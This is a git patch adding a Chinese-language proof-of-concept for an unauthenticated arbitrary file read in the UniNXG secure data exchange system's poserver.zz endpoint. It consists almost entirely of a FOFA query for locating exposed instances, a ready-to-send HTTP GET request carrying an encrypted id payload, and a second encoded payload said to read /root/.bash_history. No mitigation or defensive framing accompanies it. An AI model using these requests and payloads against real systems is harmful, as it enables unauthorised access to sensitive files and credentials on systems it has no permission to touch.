From b28fb08482df1ff7fda777c4533fd3f5a56f30e4 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 16 May 2024 19:23:02 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E8=81=94=E8=BD=AF=E5=AE=89=E6=B8=A1Un?=
 =?UTF-8?q?iNXG=E5=AE=89=E5=85=A8=E6=95=B0=E6=8D=AE=E4=BA=A4=E6=8D=A2?=
 =?UTF-8?q?=E7=B3=BB=E7=BB=9Fposerver.zz=E5=AD=98=E5=9C=A8=E4=BB=BB?=
 =?UTF-8?q?=E6=84=8F=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E?=
 =?UTF-8?q?.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...��数据交换系统poserver.zz存在任意文件读取漏洞.md | 21 +++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞.md

diff --git a/联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞.md b/联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞.md
new file mode 100644
index 0000000..c02acb4
--- /dev/null
+++ b/联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞.md
@@ -0,0 +1,21 @@
+## 联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞
+
+联软安渡UniNXG安全数据交换系统/UniExServices/poserver.zz存在任意文件读取漏洞，未经身份验证的攻击者可利用此漏洞构造加密的恶意请求读取系统内部敏感文件。
+
+## fofa
+```
+body="深圳市联软科技股份有限公司"
+```
+
+## poc
+```
+GET /UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI= HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Connection: close
+
+```
+
+读取/root/.bash_history  历史命令
+KmcgY3MtJm0lcmUsFl85ZhVmL3E4bSZ3amQvaitsF2srO2ckKW0icitsOHI/bis7OGM8cg==